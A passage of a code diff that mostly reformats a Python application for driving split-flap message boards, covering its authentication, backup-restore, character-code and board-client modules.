@@ -8325,11 +8072,7 @@ async def generic_data_test_fetch(request: dict):
     try:
         kwargs: dict = {"headers": headers, "timeout": 15, "allow_redirects": False}
         if method == "POST" and body:
-            kwargs["data"] = (
-                interpolate_string(body, _interp_vars)
-                if isinstance(body, str)
-                else body
-            )
+            kwargs["data"] = interpolate_string(body, _interp_vars) if isinstance(body, str) else body
 
         resp = req.request(method, url, **kwargs)
         resp.raise_for_status()
@@ -8339,6 +8082,7 @@ async def generic_data_test_fetch(request: dict):
 
         if fmt == "xml":
             from plugins.generic_data import _xml_to_dict
+
             # ``defusedxml`` disables external entity expansion, DTDs and
             # entity bombs by default, mitigating XXE attacks.
             root = DefusedET.fromstring(resp.text)
@@ -8406,9 +8150,7 @@ async def import_backup(
     from .backup import BackupError, get_backup_service
 
     try:
-        result = get_backup_service().import_from_dict(
-            payload, reinstall_plugins=reinstall_plugins
-        )
+        result = get_backup_service().import_from_dict(payload, reinstall_plugins=reinstall_plugins)
     except BackupError as exc:
         raise HTTPException(status_code=400, detail=str(exc)) from exc
     except Exception:
@@ -8420,4 +8162,5 @@ async def import_backup(
 
 if __name__ == "__main__":
     import uvicorn
+
     uvicorn.run(app, host="0.0.0.0", port=8000)

--- a/src/auth/__init__.py
+++ b/src/auth/__init__.py
@@ -26,12 +26,12 @@ from .service import (
 )
 
 __all__ = [
-    "AuthService",
+    "SESSION_COOKIE_NAME",
+    "AlreadySetup",
     "AuthError",
+    "AuthService",
     "InvalidCredentials",
     "SetupRequired",
-    "AlreadySetup",
     "get_auth_service",
     "is_auth_enabled",
-    "SESSION_COOKIE_NAME",
 ]

--- a/src/auth/middleware.py
+++ b/src/auth/middleware.py
@@ -53,10 +53,7 @@ _PUBLIC_EXACT: frozenset = frozenset({"/", "/auth", "/health"})
 def _is_public_path(path: str) -> bool:
     if path in _PUBLIC_EXACT:
         return True
-    for prefix in _PUBLIC_PREFIXES:
-        if path == prefix.rstrip("/") or path.startswith(prefix):
-            return True
-    return False
+    return any(path == prefix.rstrip("/") or path.startswith(prefix) for prefix in _PUBLIC_PREFIXES)
 
 
 def _is_mcp_path(path: str) -> bool:
@@ -74,12 +71,7 @@ def _is_mcp_path(path: str) -> bool:
     Both forms point at the same endpoint and should accept the same
     bearer token.
     """
-    return (
-        path == "/mcp"
-        or path.startswith("/mcp/")
-        or path == "/api/mcp"
-        or path.startswith("/api/mcp/")
-    )
+    return path == "/mcp" or path.startswith(("/mcp/", "/api/mcp/")) or path == "/api/mcp"
 
 
 def _bearer_from(request: Request) -> str | None:

--- a/src/auth/routes.py
+++ b/src/auth/routes.py
@@ -115,9 +115,7 @@ def _is_secure_request(request: Request) -> bool:
     return request.url.scheme == "https"
 
 
-def _set_session_cookie(
-    response: Response, request: Request, token: str, *, persistent: bool = True
-) -> None:
+def _set_session_cookie(response: Response, request: Request, token: str, *, persistent: bool = True) -> None:
     """Write the session cookie.
 
     When *persistent* is true the cookie gets a ``Max-Age`` (the "Keep me
@@ -227,10 +225,7 @@ async def auth_preference(payload: PreferenceRequest) -> SimpleResponse:
     if svc.has_user():
         raise HTTPException(
             status_code=status.HTTP_409_CONFLICT,
-            detail=(
-                "A user already exists. Sign in and use the account "
-                "settings to change preferences."
-            ),
+            detail=("A user already exists. Sign in and use the account settings to change preferences."),
         )
     svc.set_auth_preference("enabled" if payload.enabled else "disabled")
     return SimpleResponse(status="ok")
@@ -267,9 +262,7 @@ async def auth_login(payload: LoginRequest, request: Request, response: Response
     _check_lockout(ip)
     svc = get_auth_service()
     try:
-        token = svc.authenticate(
-            payload.username, payload.password, remember=payload.remember_me
-        )
+        token = svc.authenticate(payload.username, payload.password, remember=payload.remember_me)
     except SetupRequired:
         raise HTTPException(
             status_code=status.HTTP_409_CONFLICT,
@@ -294,17 +287,13 @@ async def auth_logout(response: Response) -> SimpleResponse:
 
 
 @router.post("/change-password", response_model=SimpleResponse)
-async def auth_change_password(
-    payload: ChangePasswordRequest, request: Request, response: Response
-) -> SimpleResponse:
+async def auth_change_password(payload: ChangePasswordRequest, request: Request, response: Response) -> SimpleResponse:
     """Change the logged-in user's password."""
     svc = get_auth_service()
     cookie = request.cookies.get(SESSION_COOKIE_NAME)
     username = svc.verify_session(cookie) if cookie else None
     if not username:
-        raise HTTPException(
-            status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated"
-        )
+        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated")
     try:
         svc.change_password(username, payload.current_password, payload.new_password)
     except InvalidCredentials:
@@ -323,21 +312,15 @@ async def auth_change_password(
 
 
 @router.post("/change-username", response_model=SimpleResponse)
-async def auth_change_username(
-    payload: ChangeUsernameRequest, request: Request, response: Response
-) -> SimpleResponse:
+async def auth_change_username(payload: ChangeUsernameRequest, request: Request, response: Response) -> SimpleResponse:
     """Rename the logged-in user, gated by their current password."""
     svc = get_auth_service()
     cookie = request.cookies.get(SESSION_COOKIE_NAME)
     username = svc.verify_session(cookie) if cookie else None
     if not username:
-        raise HTTPException(
-            status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated"
-        )
+        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated")
     try:
-        new_username = svc.change_username(
-            username, payload.current_password, payload.new_username
-        )
+        new_username = svc.change_username(username, payload.current_password, payload.new_username)
     except InvalidCredentials:
         raise HTTPException(
             status_code=status.HTTP_401_UNAUTHORIZED,
@@ -353,9 +336,7 @@ async def auth_change_username(
 
 
 @router.post("/disable", response_model=SimpleResponse)
-async def auth_disable(
-    payload: DisableAuthRequest, request: Request, response: Response
-) -> SimpleResponse:
+async def auth_disable(payload: DisableAuthRequest, request: Request, response: Response) -> SimpleResponse:
     """Turn off auth enforcement after a password check.
 
     Requires both a valid session cookie *and* the current password.
@@ -372,9 +353,7 @@ async def auth_disable(
     cookie = request.cookies.get(SESSION_COOKIE_NAME)
     username = svc.verify_session(cookie) if cookie else None
     if not username:
-        raise HTTPException(
-            status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated"
-        )
+        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated")
     try:
         svc.disable_auth_for_user(username, payload.current_password)
     except InvalidCredentials:
@@ -414,9 +393,7 @@ def _require_admin(request: Request) -> str:
     cookie = request.cookies.get(SESSION_COOKIE_NAME)
     username = svc.verify_session(cookie) if cookie else None
     if not username:
-        raise HTTPException(
-            status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated"
-        )
+        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Not authenticated")
     return username
 
 

--- a/src/auth/service.py
+++ b/src/auth/service.py
@@ -19,6 +19,7 @@ Design notes
 from __future__ import annotations
 
 import base64
+import contextlib
 import hashlib
 import hmac
 import json
@@ -40,7 +41,7 @@ SESSION_COOKIE_NAME = "fiestaboard_session"
 
 # scrypt parameters: ~64MB / ~100ms on a modern CPU. Tuned for interactive
 # logins on a Raspberry-Pi-class host; bump N for stronger.
-_SCRYPT_N = 2 ** 15
+_SCRYPT_N = 2**15
 _SCRYPT_R = 8
 _SCRYPT_P = 1
 _SCRYPT_DKLEN = 32
@@ -75,9 +76,7 @@ def _session_ttl_seconds() -> int:
 
 
 def _remember_me_ttl_seconds() -> int:
-    return _ttl_from_env(
-        "FIESTABOARD_REMEMBER_ME_TTL_SECONDS", _DEFAULT_REMEMBER_ME_TTL_SECONDS
-    )
+    return _ttl_from_env("FIESTABOARD_REMEMBER_ME_TTL_SECONDS", _DEFAULT_REMEMBER_ME_TTL_SECONDS)
 
 
 def is_auth_enabled() -> bool:
@@ -331,10 +330,7 @@ class SessionToken:
         # Embedded in the payload, not the header, so an attacker can't
         # selectively shorten / extend the session.
         nonce = _b64e(secrets.token_bytes(8))
-        return (
-            f"{_b64e(self.username.encode('utf-8'))}."
-            f"{self.issued_at}.{self.expires_at}.{nonce}"
-        )
+        return f"{_b64e(self.username.encode('utf-8'))}.{self.issued_at}.{self.expires_at}.{nonce}"
 
 
 def _now_ms() -> int:
@@ -391,7 +387,7 @@ class AuthService:
         if not self._path.exists():
             return
         try:
-            with open(self._path, encoding="utf-8") as fh:
+            with self._path.open(encoding="utf-8") as fh:
                 self._data = json.load(fh)
         except (json.JSONDecodeError, OSError) as exc:
             logger.error("Failed to read %s: %s; starting empty", self._path, exc)
@@ -416,15 +412,13 @@ class AuthService:
                 json.dump(self._data, fh, indent=2)
                 fh.flush()
                 os.fsync(fh.fileno())
-            os.replace(tmp, self._path)
+            Path(tmp).replace(self._path)
         except Exception:
-            try:
+            # Cleanup of a cleanup failure — nothing useful we can do;
+            # the original exception below is the one that matters and
+            # we don't want to mask it.
+            with contextlib.suppress(OSError):
                 tmp.unlink(missing_ok=True)
-            except OSError:
-                # Cleanup of a cleanup failure — nothing useful we can
-                # do; the original exception below is the one that
-                # matters and we don't want to mask it.
-                pass
             raise
 
     # -- queries -----------------------------------------------------------
@@ -597,9 +591,7 @@ class AuthService:
                 if u.get("username") == username:
                     if not verify_password(password, u.get("password_hash", "")):
                         raise InvalidCredentials("Password is incorrect")
-                    self._data["users"] = [
-                        other for other in users if other is not u
-                    ]
+                    self._data["users"] = [other for other in users if other is not u]
                     self._data["auth_pref"] = "disabled"
                     self._save()
                     return
@@ -607,9 +599,7 @@ class AuthService:
 
     # -- auth flow ---------------------------------------------------------
 
-    def authenticate(
-        self, username: str, password: str, *, remember: bool = False
-    ) -> str:
+    def authenticate(self, username: str, password: str, *, remember: bool = False) -> str:
         """Verify *username*/*password* and return a signed session token.
 
         When *remember* is true the token is minted with the longer
@@ -694,22 +684,16 @@ def _validate_username(username: str) -> None:
         raise ValueError("username must not have leading/trailing whitespace")
     for ch in username:
         if not (ch.isalnum() or ch in "._-@"):
-            raise ValueError(
-                "username may only contain letters, digits, '.', '_', '-', '@'"
-            )
+            raise ValueError("username may only contain letters, digits, '.', '_', '-', '@'")
 
 
 def _validate_password(password: str) -> None:
     if not isinstance(password, str):
         raise ValueError("password must be a string")
     if len(password) < _PASSWORD_MIN:
-        raise ValueError(
-            f"password must be at least {_PASSWORD_MIN} characters"
-        )
+        raise ValueError(f"password must be at least {_PASSWORD_MIN} characters")
     if len(password) > _PASSWORD_MAX:
-        raise ValueError(
-            f"password must be at most {_PASSWORD_MAX} characters"
-        )
+        raise ValueError(f"password must be at most {_PASSWORD_MAX} characters")
 
 
 # --- Module-level singleton -----------------------------------------------

--- a/src/backup/service.py
+++ b/src/backup/service.py
@@ -91,7 +91,7 @@ class BackupService:
             installed_plugins = self._collect_installed_plugins()
 
             try:
-                from .. import __version__ as app_version
+                from src import __version__ as app_version
             except Exception:  # pragma: no cover - defensive only
                 app_version = "unknown"
 
@@ -153,9 +153,7 @@ class BackupService:
                 if payload is None:
                     skipped.append(filename)
                     continue
-                self._write_json_with_backup(
-                    self.data_dir / filename, payload, timestamp
-                )
+                self._write_json_with_backup(self.data_dir / filename, payload, timestamp)
                 restored.append(filename)
 
         plugin_results: dict[str, Any] = {
@@ -202,7 +200,7 @@ class BackupService:
         if not path.exists():
             return None
         try:
-            with open(path, encoding="utf-8") as fh:
+            with path.open(encoding="utf-8") as fh:
                 return json.load(fh)
         except (OSError, json.JSONDecodeError) as exc:
             logger.warning("Could not read %s for backup: %s", path, exc)
@@ -227,7 +225,7 @@ class BackupService:
                 logger.warning("Could not write pre-restore backup %s: %s", backup_path, exc)
 
         tmp_path = path.with_suffix(path.suffix + ".tmp")
-        with open(tmp_path, "w", encoding="utf-8") as fh:
+        with tmp_path.open("w", encoding="utf-8") as fh:
             json.dump(payload, fh, indent=2)
         tmp_path.replace(path)
 
@@ -236,10 +234,7 @@ class BackupService:
         if not isinstance(backup, dict):
             raise BackupError("Backup file must be a JSON object.")
         if not backup.get(BACKUP_FILE_MARKER):
-            raise BackupError(
-                "File does not look like a FiestaBoard backup "
-                f"(missing '{BACKUP_FILE_MARKER}' marker)."
-            )
+            raise BackupError(f"File does not look like a FiestaBoard backup (missing '{BACKUP_FILE_MARKER}' marker).")
         version = backup.get("schema_version")
         if not isinstance(version, int):
             raise BackupError("Backup file is missing 'schema_version'.")
@@ -260,7 +255,7 @@ class BackupService:
         and never need to be reinstalled.
         """
         try:
-            from ..plugins import get_plugin_registry  # type: ignore
+            from src.plugins import get_plugin_registry  # type: ignore
         except Exception:  # pragma: no cover - plugin system optional
             return []
 
@@ -307,13 +302,11 @@ class BackupService:
         }
 
         try:
-            from ..plugins import get_plugin_registry  # type: ignore
+            from src.plugins import get_plugin_registry  # type: ignore
         except Exception:
             for entry in installed_meta:
                 pid = entry.get("plugin_id", "")
-                result["failed"].append(
-                    {"plugin_id": pid, "error": "plugin system unavailable"}
-                )
+                result["failed"].append({"plugin_id": pid, "error": "plugin system unavailable"})
             return result
 
         try:
@@ -322,9 +315,7 @@ class BackupService:
             logger.warning("Plugin registry unavailable during restore: %s", exc)
             for entry in installed_meta:
                 pid = entry.get("plugin_id", "")
-                result["failed"].append(
-                    {"plugin_id": pid, "error": "plugin registry unavailable"}
-                )
+                result["failed"].append({"plugin_id": pid, "error": "plugin registry unavailable"})
             return result
 
         for entry in installed_meta:
@@ -336,9 +327,7 @@ class BackupService:
             # Validate plugin_id with a strict allowlist.
             pid_m = _BACKUP_PLUGIN_ID_RE.fullmatch(plugin_id)
             if pid_m is None:
-                result["failed"].append(
-                    {"plugin_id": plugin_id, "error": "invalid plugin id in backup"}
-                )
+                result["failed"].append({"plugin_id": plugin_id, "error": "invalid plugin id in backup"})
                 continue
             safe_plugin_id = pid_m.group(0)
 
@@ -371,15 +360,11 @@ class BackupService:
                 errors = registry.install_from_registry(safe_plugin_id)
             except Exception:  # pragma: no cover - defensive
                 logger.exception("Plugin reinstall raised: %s", safe_plugin_id)
-                result["failed"].append(
-                    {"plugin_id": safe_plugin_id, "error": "install failed (see server logs)"}
-                )
+                result["failed"].append({"plugin_id": safe_plugin_id, "error": "install failed (see server logs)"})
                 continue
 
             if errors:
-                result["failed"].append(
-                    {"plugin_id": safe_plugin_id, "error": "; ".join(errors)}
-                )
+                result["failed"].append({"plugin_id": safe_plugin_id, "error": "; ".join(errors)})
             else:
                 result["installed"].append(safe_plugin_id)
 
@@ -414,7 +399,8 @@ def _reload_services() -> list[str]:
 
     # Config manager: re-read config.json from disk.
     try:
-        from ..config_manager import get_config_manager
+        from src.config_manager import get_config_manager
+
         get_config_manager().reload()
     except Exception:  # pragma: no cover - defensive
         logger.exception("Failed to reload config manager")
@@ -430,6 +416,7 @@ def _reload_services() -> list[str]:
     ):
         try:
             import importlib
+
             mod = importlib.import_module(module_path)
             if hasattr(mod, attr):
                 setattr(mod, attr, None)
@@ -439,7 +426,8 @@ def _reload_services() -> list[str]:
 
     # Display service has its own reset helper.
     try:
-        from ..displays.service import reset_display_service
+        from src.displays.service import reset_display_service
+
         reset_display_service()
     except Exception:  # pragma: no cover - defensive
         logger.exception("Failed to reset display service")
@@ -448,7 +436,8 @@ def _reload_services() -> list[str]:
     # Template engine caches plugin variables — reset so it picks up the
     # restored plugin configuration on next render.
     try:
-        from ..templates.engine import reset_template_engine
+        from src.templates.engine import reset_template_engine
+
         reset_template_engine()
     except Exception:  # pragma: no cover - defensive
         logger.exception("Failed to reset template engine")

--- a/src/board_chars.py
+++ b/src/board_chars.py
@@ -7,12 +7,11 @@ Note: Some codes (43, 45, 51, 57, 58, 61) are not defined in the official table.
 """
 
 
-
 class BoardChars:
     """Board character code mappings - Official codes."""
 
     # Blank/Space
-    SPACE = 0       # Black on black / white on white
+    SPACE = 0  # Black on black / white on white
 
     # Letters A-Z (codes 1-26)
     A = 1
@@ -55,31 +54,31 @@ class BoardChars:
     ZERO = 36
 
     # Punctuation and symbols (official codes)
-    EXCLAMATION = 37     # !
-    AT = 38              # @
-    POUND = 39           # #
-    DOLLAR = 40          # $
-    LEFT_PAREN = 41      # (
-    RIGHT_PAREN = 42     # )
+    EXCLAMATION = 37  # !
+    AT = 38  # @
+    POUND = 39  # #
+    DOLLAR = 40  # $
+    LEFT_PAREN = 41  # (
+    RIGHT_PAREN = 42  # )
     # 43 is undefined
-    DASH = 44            # - (hyphen)
+    DASH = 44  # - (hyphen)
     # 45 is undefined
-    PLUS = 46            # +
-    AMPERSAND = 47       # &
-    EQUALS = 48          # =
-    SEMICOLON = 49       # ;
-    COLON = 50           # :
+    PLUS = 46  # +
+    AMPERSAND = 47  # &
+    EQUALS = 48  # =
+    SEMICOLON = 49  # ;
+    COLON = 50  # :
     # 51 is undefined
-    SINGLE_QUOTE = 52    # '
-    DOUBLE_QUOTE = 53    # "
-    PERCENT = 54         # %
-    COMMA = 55           # ,
-    PERIOD = 56          # .
+    SINGLE_QUOTE = 52  # '
+    DOUBLE_QUOTE = 53  # "
+    PERCENT = 54  # %
+    COMMA = 55  # ,
+    PERIOD = 56  # .
     # 57-58 are undefined
-    SLASH = 59           # /
-    QUESTION = 60        # ?
+    SLASH = 59  # /
+    QUESTION = 60  # ?
     # 61 is undefined
-    DEGREE = 62          # ° (Flagship only, Heart on Note)
+    DEGREE = 62  # ° (Flagship only, Heart on Note)
 
     # Color codes (filled color tiles)
     RED = 63
@@ -87,10 +86,10 @@ class BoardChars:
     YELLOW = 65
     GREEN = 66
     BLUE = 67
-    VIOLET = 68          # Also called Purple
-    WHITE = 69           # Black on white board (local API)
-    BLACK = 70           # White on white board (local API)
-    FILLED = 71          # White on black / black on white (not available for local API)
+    VIOLET = 68  # Also called Purple
+    WHITE = 69  # Black on white board (local API)
+    BLACK = 70  # White on white board (local API)
+    FILLED = 71  # White on black / black on white (not available for local API)
 
     # Aliases for compatibility
     APOSTROPHE = SINGLE_QUOTE
@@ -111,40 +110,40 @@ class BoardChars:
         char = char.upper()
 
         # Letters A-Z → codes 1-26
-        if 'A' <= char <= 'Z':
-            return ord(char) - ord('A') + 1
+        if "A" <= char <= "Z":
+            return ord(char) - ord("A") + 1
 
         # Numbers: 1-9 → codes 27-35, 0 → code 36
-        if '1' <= char <= '9':
-            return ord(char) - ord('1') + 27  # 1→27, 2→28, ..., 9→35
-        elif char == '0':
+        if "1" <= char <= "9":
+            return ord(char) - ord("1") + 27  # 1→27, 2→28, ..., 9→35
+        if char == "0":
             return 36
 
         # Special characters mapping (official codes)
         special_map = {
-            ' ': cls.SPACE,
-            '!': cls.EXCLAMATION,
-            '@': cls.AT,
-            '#': cls.POUND,
-            '$': cls.DOLLAR,
-            '(': cls.LEFT_PAREN,
-            ')': cls.RIGHT_PAREN,
-            '-': cls.DASH,
-            '+': cls.PLUS,
-            '&': cls.AMPERSAND,
-            '=': cls.EQUALS,
-            ';': cls.SEMICOLON,
-            ':': cls.COLON,
+            " ": cls.SPACE,
+            "!": cls.EXCLAMATION,
+            "@": cls.AT,
+            "#": cls.POUND,
+            "$": cls.DOLLAR,
+            "(": cls.LEFT_PAREN,
+            ")": cls.RIGHT_PAREN,
+            "-": cls.DASH,
+            "+": cls.PLUS,
+            "&": cls.AMPERSAND,
+            "=": cls.EQUALS,
+            ";": cls.SEMICOLON,
+            ":": cls.COLON,
             "'": cls.SINGLE_QUOTE,
             '"': cls.DOUBLE_QUOTE,
-            '%': cls.PERCENT,
-            ',': cls.COMMA,
-            '.': cls.PERIOD,
-            '/': cls.SLASH,
-            '?': cls.QUESTION,
-            '°': cls.DEGREE,
-            '❤': cls.DEGREE,  # Heart on Note devices shares code 62
-            '♥': cls.DEGREE,
+            "%": cls.PERCENT,
+            ",": cls.COMMA,
+            ".": cls.PERIOD,
+            "/": cls.SLASH,
+            "?": cls.QUESTION,
+            "°": cls.DEGREE,
+            "❤": cls.DEGREE,  # Heart on Note devices shares code 62
+            "♥": cls.DEGREE,
         }
 
         return special_map.get(char)
@@ -161,16 +160,16 @@ class BoardChars:
             Color code or None if not found
         """
         color_map = {
-            'red': cls.RED,
-            'orange': cls.ORANGE,
-            'yellow': cls.YELLOW,
-            'green': cls.GREEN,
-            'blue': cls.BLUE,
-            'violet': cls.VIOLET,
-            'purple': cls.VIOLET,
-            'white': cls.WHITE,
-            'black': cls.BLACK,
-            'filled': cls.FILLED,
+            "red": cls.RED,
+            "orange": cls.ORANGE,
+            "yellow": cls.YELLOW,
+            "green": cls.GREEN,
+            "blue": cls.BLUE,
+            "violet": cls.VIOLET,
+            "purple": cls.VIOLET,
+            "white": cls.WHITE,
+            "black": cls.BLACK,
+            "filled": cls.FILLED,
         }
         return color_map.get(color_name.lower())
 
@@ -201,78 +200,22 @@ WEATHER_SYMBOLS: dict[str, dict[str, any]] = {
     "Clear": {
         "symbol": "O",  # Sun approximation
         "char_code": BoardChars.O,
-        "description": "Sunny"
+        "description": "Sunny",
     },
-    "Sunny": {
-        "symbol": "O",
-        "char_code": BoardChars.O,
-        "description": "Sunny"
-    },
-    "Partly Cloudy": {
-        "symbol": "%",
-        "char_code": BoardChars.PERCENT,
-        "description": "Partly"
-    },
-    "Cloudy": {
-        "symbol": "O",
-        "char_code": BoardChars.O,
-        "description": "Cloudy"
-    },
-    "Overcast": {
-        "symbol": "O",
-        "char_code": BoardChars.O,
-        "description": "Overcast"
-    },
-    "Rain": {
-        "symbol": "/",
-        "char_code": BoardChars.SLASH,
-        "description": "Rain"
-    },
-    "Rainy": {
-        "symbol": "/",
-        "char_code": BoardChars.SLASH,
-        "description": "Rain"
-    },
-    "Light Rain": {
-        "symbol": "/",
-        "char_code": BoardChars.SLASH,
-        "description": "Lt Rain"
-    },
-    "Heavy Rain": {
-        "symbol": "/",
-        "char_code": BoardChars.SLASH,
-        "description": "Hvy Rain"
-    },
-    "Thunderstorm": {
-        "symbol": "!",
-        "char_code": BoardChars.EXCLAMATION,
-        "description": "Storm"
-    },
-    "Storm": {
-        "symbol": "!",
-        "char_code": BoardChars.EXCLAMATION,
-        "description": "Storm"
-    },
-    "Snow": {
-        "symbol": "O",
-        "char_code": BoardChars.O,
-        "description": "Snow"
-    },
-    "Snowy": {
-        "symbol": "O",
-        "char_code": BoardChars.O,
-        "description": "Snow"
-    },
-    "Fog": {
-        "symbol": "-",
-        "char_code": BoardChars.DASH,
-        "description": "Fog"
-    },
-    "Mist": {
-        "symbol": "-",
-        "char_code": BoardChars.DASH,
-        "description": "Mist"
-    },
+    "Sunny": {"symbol": "O", "char_code": BoardChars.O, "description": "Sunny"},
+    "Partly Cloudy": {"symbol": "%", "char_code": BoardChars.PERCENT, "description": "Partly"},
+    "Cloudy": {"symbol": "O", "char_code": BoardChars.O, "description": "Cloudy"},
+    "Overcast": {"symbol": "O", "char_code": BoardChars.O, "description": "Overcast"},
+    "Rain": {"symbol": "/", "char_code": BoardChars.SLASH, "description": "Rain"},
+    "Rainy": {"symbol": "/", "char_code": BoardChars.SLASH, "description": "Rain"},
+    "Light Rain": {"symbol": "/", "char_code": BoardChars.SLASH, "description": "Lt Rain"},
+    "Heavy Rain": {"symbol": "/", "char_code": BoardChars.SLASH, "description": "Hvy Rain"},
+    "Thunderstorm": {"symbol": "!", "char_code": BoardChars.EXCLAMATION, "description": "Storm"},
+    "Storm": {"symbol": "!", "char_code": BoardChars.EXCLAMATION, "description": "Storm"},
+    "Snow": {"symbol": "O", "char_code": BoardChars.O, "description": "Snow"},
+    "Snowy": {"symbol": "O", "char_code": BoardChars.O, "description": "Snow"},
+    "Fog": {"symbol": "-", "char_code": BoardChars.DASH, "description": "Fog"},
+    "Mist": {"symbol": "-", "char_code": BoardChars.DASH, "description": "Mist"},
 }
 
 
@@ -308,7 +251,7 @@ def get_weather_symbol(condition: str) -> dict[str, any]:
     return {
         "symbol": "?",
         "char_code": BoardChars.QUESTION,
-        "description": condition[:8]  # Truncate long descriptions
+        "description": condition[:8],  # Truncate long descriptions
     }
 
 

--- a/src/board_client.py
+++ b/src/board_client.py
@@ -24,14 +24,14 @@ logger = logging.getLogger(__name__)
 
 # Regex pattern to match color markers like {63}, {red}, {/}, {/red}
 COLOR_MARKER_PATTERN = re.compile(
-    r'\{(?:' +
-    r'/?' +  # Optional closing slash
-    r'(?:' +
-    r'6[3-9]|70|' +  # Numeric codes 63-70
-    r'red|orange|yellow|green|blue|violet|purple|white|black' +  # Named colors
-    r')?' +  # Color name/code is optional for {/}
-    r')\}',
-    re.IGNORECASE
+    r"\{(?:"
+    + r"/?"  # Optional closing slash
+    + r"(?:"
+    + r"6[3-9]|70|"  # Numeric codes 63-70
+    + r"red|orange|yellow|green|blue|violet|purple|white|black"  # Named colors
+    + r")?"  # Color name/code is optional for {/}
+    + r")\}",
+    re.IGNORECASE,
 )
 
 
@@ -48,22 +48,20 @@ def strip_color_markers(text: str) -> str:
     Returns:
         Text with color markers removed
     """
-    return COLOR_MARKER_PATTERN.sub('', text)
+    return COLOR_MARKER_PATTERN.sub("", text)
+
 
 # Valid transition strategies
 TransitionStrategy = Literal[
-    "column",           # Wave - left-to-right
-    "reverse-column",   # Drift - right-to-left
+    "column",  # Wave - left-to-right
+    "reverse-column",  # Drift - right-to-left
     "edges-to-center",  # Curtain - outside-in
-    "row",              # Top-to-bottom (API only)
-    "diagonal",         # Corner-to-corner (API only)
-    "random"            # Random tiles (API only)
+    "row",  # Top-to-bottom (API only)
+    "diagonal",  # Corner-to-corner (API only)
+    "random",  # Random tiles (API only)
 ]
 
-VALID_STRATEGIES = [
-    "column", "reverse-column", "edges-to-center",
-    "row", "diagonal", "random"
-]
+VALID_STRATEGIES = ["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"]
 
 
 def _valid_grid_dimensions() -> set:
@@ -123,9 +121,7 @@ def is_successful_board_read_response(data: Any) -> bool:
     """True if GET body indicates a working read (grid or explicit empty state)."""
     if parse_read_message_payload(data) is not None:
         return True
-    if isinstance(data, dict) and "currentMessage" in data and data.get("currentMessage") is None:
-        return True
-    return False
+    return bool(isinstance(data, dict) and "currentMessage" in data and data.get("currentMessage") is None)
 
 
 class BoardClient:
@@ -170,10 +166,7 @@ class BoardClient:
         if use_cloud:
             # Cloud API mode
             self.base_url = self.CLOUD_API_URL
-            self.headers = {
-                "X-Vestaboard-Read-Write-Key": api_key,
-                "Content-Type": "application/json"
-            }
+            self.headers = {"X-Vestaboard-Read-Write-Key": api_key, "Content-Type": "application/json"}
             logger.info(f"Board client initialized with Cloud API (skip_unchanged={skip_unchanged})")
         else:
             # Local API mode
@@ -181,21 +174,16 @@ class BoardClient:
                 raise ValueError("host is required for Local API")
             self.host = host
             self.base_url = f"http://{host}:{self._port}/local-api/message"
-            self.headers = {
-                "X-Vestaboard-Local-Api-Key": api_key,
-                "Content-Type": "application/json"
-            }
-            logger.info(f"Board client initialized with Local API at {host}:{self._port} (skip_unchanged={skip_unchanged})")
+            self.headers = {"X-Vestaboard-Local-Api-Key": api_key, "Content-Type": "application/json"}
+            logger.info(
+                f"Board client initialized with Local API at {host}:{self._port} (skip_unchanged={skip_unchanged})"
+            )
 
         # Client-side cache to avoid sending unchanged messages
         self._last_text: str | None = None
         self._last_characters: list[list[int]] | None = None
 
-    def send_text(
-        self,
-        text: str,
-        force: bool = False
-    ) -> tuple[bool, bool]:
+    def send_text(self, text: str, force: bool = False) -> tuple[bool, bool]:
         """
         Send plain text message to the board.
 
@@ -226,12 +214,7 @@ class BoardClient:
         payload = {"text": clean_text}
 
         try:
-            response = requests.post(
-                self.base_url,
-                headers=self.headers,
-                json=payload,
-                timeout=10
-            )
+            response = requests.post(self.base_url, headers=self.headers, json=payload, timeout=10)
             response.raise_for_status()
 
             self._last_text = clean_text
@@ -242,7 +225,7 @@ class BoardClient:
 
         except requests.exceptions.RequestException as e:
             logger.error(f"Failed to send message to board: {e}")
-            if hasattr(e, 'response') and e.response is not None:
+            if hasattr(e, "response") and e.response is not None:
                 logger.error(f"Response: {e.response.text}")
             return (False, False)
 
@@ -252,7 +235,7 @@ class BoardClient:
         strategy: TransitionStrategy | None = None,
         step_interval_ms: int | None = None,
         step_size: int | None = None,
-        force: bool = False
+        force: bool = False,
     ) -> tuple[bool, bool]:
         """
         Send message using character array format with optional transitions.
@@ -285,8 +268,7 @@ class BoardClient:
         num_cols = len(characters[0]) if num_rows > 0 and isinstance(characters[0], list) else 0
         if (num_rows, num_cols) not in valid_dims:
             logger.error(
-                f"Invalid grid: {num_rows}x{num_cols} is not a supported device size. "
-                f"Valid sizes: {sorted(valid_dims)}"
+                f"Invalid grid: {num_rows}x{num_cols} is not a supported device size. Valid sizes: {sorted(valid_dims)}"
             )
             return (False, False)
 
@@ -320,12 +302,7 @@ class BoardClient:
                 payload["step_size"] = step_size
 
         try:
-            response = requests.post(
-                self.base_url,
-                headers=self.headers,
-                json=payload,
-                timeout=10
-            )
+            response = requests.post(self.base_url, headers=self.headers, json=payload, timeout=10)
             response.raise_for_status()
 
             self._last_characters = [row[:] for row in characters]
@@ -342,7 +319,7 @@ class BoardClient:
 
         except requests.exceptions.RequestException as e:
             logger.error(f"Failed to send character array to board: {e}")
-            if hasattr(e, 'response') and e.response is not None:
+            if hasattr(e, "response") and e.response is not None:
                 logger.error(f"Response: {e.response.text}")
             return (False, False)
 
@@ -358,11 +335,7 @@ class BoardClient:
             Character grid (Flagship 6x22 or Note 3x15), or None if failed or empty.
         """
         try:
-            response = requests.get(
-                self.base_url,
-                headers=self.headers,
-                timeout=10
-            )
+            response = requests.get(self.base_url, headers=self.headers, timeout=10)
             response.raise_for_status()
             data = response.json()
             characters = parse_read_message_payload(data)
@@ -391,10 +364,12 @@ class BoardClient:
             "has_cached_text": self._last_text is not None,
             "has_cached_characters": self._last_characters is not None,
             "skip_unchanged_enabled": self.skip_unchanged,
-            "cached_text_preview": self._last_text[:50] + "..." if self._last_text and len(self._last_text) > 50 else self._last_text
+            "cached_text_preview": self._last_text[:50] + "..."
+            if self._last_text and len(self._last_text) > 50
